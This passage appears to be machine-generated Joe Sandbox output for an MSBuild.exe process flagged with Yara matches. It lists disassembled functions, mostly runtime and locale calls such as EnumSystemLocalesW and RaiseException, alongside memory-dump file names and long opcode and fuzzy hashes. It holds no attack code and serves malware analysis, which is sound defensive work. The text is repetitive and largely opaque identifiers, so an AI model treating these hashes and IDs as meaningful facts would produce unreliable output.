                                                                                                                                            • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F2B
• GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0045110E
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ErrorLast$_free$InfoLocale_abort
• String ID: u;~/
• API String ID: 1663032902-1979702588
• Opcode ID: 9286f156abac91c7ed9d9ee6f3e5b08bc3c26a4b89b9db52a82557d4143127a2
• Instruction ID: 725ff80feb3504da526bb6f16fdbe645276de1ecdd37ac2f1e7666d8a95350e0
• Instruction Fuzzy Hash: 2D21B332500606ABDB249A25DC46B7B73A8EB09316F1041BBFE01C6252EB79DD48CB99
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(00450E6A,00000001,00000000,?,<D,?,00451497,00000000,?,?,?), ref: 00450DB4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: <D
• API String ID: 1084509184-3866323178
• Opcode ID: 99518e0148a584110f8bf4689e731d5402797eff59b4f7bbd4ab81c0230e503e
• Instruction ID: b1cdb4a87285138648e71eec5b58018a028c0508cbf90fbfa4a5e64eba390ba2
• Instruction Fuzzy Hash: 9C11293B2007055FDB189F79D8916BAB7A1FF8031AB14442DE94647741D375B846C744
APIs
  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
• EnumSystemLocalesW.KERNEL32(004510BA,00000001,?,?,<D,?,0045145B,<D,?,?,?,?,?,00443CEC,?,?), ref: 00450E29
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ErrorLast$EnumLocalesSystem_abort_free
• String ID: <D
• API String ID: 1084509184-3866323178
• Opcode ID: e0c48b72e2c1269c4cdc51d0e461bd75820cdd7fcb75359b91497d16354a5322
• Instruction ID: d323619e2976bd52c5edaa4f55efd93dda7e8b303aa23e489220a9c0c916f3e4
• Instruction Fuzzy Hash: 5BF0223A2003045FDB145F3AD882AAB7B95EF81729B25842EFD058B782D275AC42C644
APIs
  • Part of subcall function 00444ACC: EnterCriticalSection.KERNEL32(-00471558,?,0044225B,00000000,0046DAC0,0000000C,00442216,0000000A,?,?,00448739,0000000A,?,00446F74,00000001,00000364), ref: 00444ADB
• EnumSystemLocalesW.KERNEL32(00447068,00000001,0046DC48,0000000C), ref: 004470E6
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: CriticalEnterEnumLocalesSectionSystem
• String ID: u;~/
• API String ID: 1272433827-1979702588
• Opcode ID: 294c88a1965c44704c377604ff0a5917817e93c6b6b84f866ad5a3c5a2dedf6a
• Instruction ID: 877f7ae5c491a2fbf36f534f7b8138893028b6a81f24f5c3744eb9f6a7677366
• Instruction Fuzzy Hash: F6F04932A10200EFEB04EF68E806B4D77B0EB44725F10816AF414DB2E2DB7889818B49
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5fe4b2cb4502993dbea9aed901accaaf97bf6201a09a40e91719f5fde44f0d4f
• Instruction ID: cffdc6bb8eb20f5336ace8b102e865ec7dcfb2cf624fb46ac032ba80a60d6a90
• Instruction Fuzzy Hash: 8A024C71E002199BEF14CFA9C9806AEBBF1FF88314F25826AD919E7350D735AD45CB84
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID: u;~/$BG3i@
• API String ID: 0-1333258365
• Opcode ID: da6bc0b681a35a8a8cd82b5b62752965acc1f5aabf11132faead2372da36057a
• Instruction ID: a817909710d0090f483bb13cdd1d1ee80d6dfae79024daed79820ace932836b2
• Instruction Fuzzy Hash: E361777160070966DA385A2858D6BBF6396EB0DB04F10391BE943FF3C1D61DAD43874E
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,1000B5BC,?,?,00000008,?,?,1000B25C,00000000), ref: 1000B7EE
Memory Dump Source
• Source File: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 5385f7ee1153a66eb2669645b58237e3e0719d9079e030963b5c19e75e4dc3f3
• Instruction ID: c899a2dc376e060411cab8954cdd4c29929d9ba6cfa71f030d59b99a2ca162da
• Instruction Fuzzy Hash: 0DB16B31610A09CFE755CF28C486B647BE0FF453A4F25C658E89ACF2A5C735E982CB40
APIs
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,004520CD,?,?,00000008,?,?,00455412,00000000), ref: 004522FF
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: ExceptionRaise
• String ID:
• API String ID: 3997070919-0
• Opcode ID: 10c23660bdf4a559c67b3dd21211c83afc8534fe451efaff8b0d30b37073b707
• Instruction ID: 47108b7899804ebb5d40a9255b8f0d240b678f8396b787326aeb691ef157153f
• Instruction Fuzzy Hash: C0B18F351106089FD715CF28C586B567BE0FF06325F29869AEC99CF3A2C379E986CB44
Strings
Memory Dump Source
• Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
• Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID:
• String ID: 0
• API String ID: 0-4108050209
• Opcode ID: d7e2f1edd223cd44d70c9618c0c5ab444609e4c73f269a0cd31c5ec718f0b721
• Instruction ID: f72c02501a8b687524d4eed2bba9748ce27a8789a4669d3223b659a6f876a8a8
• Instruction Fuzzy Hash: 8002B3727083004BD714DF39D95272EF3E2AFCC758F15492EF499AB391DA78A8058A4A
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                            • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00451088,00000000,00000000,?), ref: 00451316
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$InfoLocale_abort_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2692324296-0
                                                                                                                                            • Opcode ID: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                                            • Instruction ID: 964a9937ac5a020d26487979adcc3deadbef587b10f76395f6381cc8137ce6dd
                                                                                                                                            • Opcode Fuzzy Hash: b6b1206c8d774c000a1b4b507e47eef55c4aaf57ff81984432bbf3fd36f42e7a
                                                                                                                                            • Instruction Fuzzy Hash: 10F07D32500111BBEB286A25CC16BFF7758EB00716F15046BEC06A3651FA38FD49C6D4
                                                                                                                                            APIs
                                                                                                                                              • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,00000000,?,0043B955,00000000,00000000), ref: 00446EC3
                                                                                                                                              • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                              • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00446F37
                                                                                                                                              • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                            • EnumSystemLocalesW.KERNEL32(00450C4E,00000001,?,?,?,004514B9,<D,?,?,?,?,?,00443CEC,?,?,?), ref: 00450D2E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 1084509184-0
                                                                                                                                            • Opcode ID: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                            • Instruction ID: ec648f77c102ae861fabd43d141f98194b25f4d0b1f390d0839222eb7000fb0b
                                                                                                                                            • Opcode Fuzzy Hash: 8c2bccbfd0fc102635c006ca31f830fd57f68f19690e6c985b1f52cdbb333b18
                                                                                                                                            • Instruction Fuzzy Hash: CBF05C3D30020557CB159F35D81576B7F94EFC2711B07405AFE098B381C239D846C754
                                                                                                                                            APIs
                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_00033CE3,004339B1), ref: 00433CDC
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ExceptionFilterUnhandled
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3192549508-0
                                                                                                                                            • Opcode ID: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                            • Instruction ID: 83953e3dca8a62111c248ad4478ddd9c1373f985a30770e5fc8846644fe13ce9
                                                                                                                                            • Opcode Fuzzy Hash: 3670727f3e8651977646328ecd403d2a1b3c6ba49dd5bfb528ab2007e995f695
                                                                                                                                            • Instruction Fuzzy Hash:
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: u;~/
                                                                                                                                            • API String ID: 0-1979702588
                                                                                                                                            • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                                            • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                                                                                                            • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                                            • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: 0
                                                                                                                                            • API String ID: 0-4108050209
                                                                                                                                            • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                            • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                                                                                                            • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                                            • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: @
                                                                                                                                            • API String ID: 0-2766056989
                                                                                                                                            • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                                            • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                                                                                                            • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                                            • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: >G
                                                                                                                                            • API String ID: 0-1296849874
                                                                                                                                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                            • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                                                                                                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                                            • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3638136028.0000000010016000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3638101142.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3638136028.0000000010001000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_10000000_MSBuild.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                            • Instruction ID: 44f99013a838546abf86f75096a930c39f9ce457c7277da91ad5f6740c4fb7fb
                                                                                                                                            • Opcode Fuzzy Hash: f12bac2ceacaba3709f449de7301e54826307763cc64d35c491f096f7cc92462
                                                                                                                                            • Instruction Fuzzy Hash: 89628C316083958FD324DF28C48469ABBF1FF85384F154A2DE9E98B391E771D989CB42
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                                            • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                                                                                                            • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                                            • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmp
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                                                                                                            • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                                                                                                            • Opcode Fuzzy Hash: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                                                                                                            • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                                            • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                                                                                                            • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                                            • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                                                            • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                                                                                                            • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                                                            • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                                                                                                            • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                                                                                                            • Opcode Fuzzy Hash: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                                                                                                            • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                                            • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                                                                                                            • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                                            • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.3625889618.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.3625889618.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID:
                                                                                                                                            • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                                                                                                            • Instruction ID: c2ccfb52f11e3b3b259396a7657262a28929e77abe156aeb413db61674ad6f9a
                                                                                                                                            • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
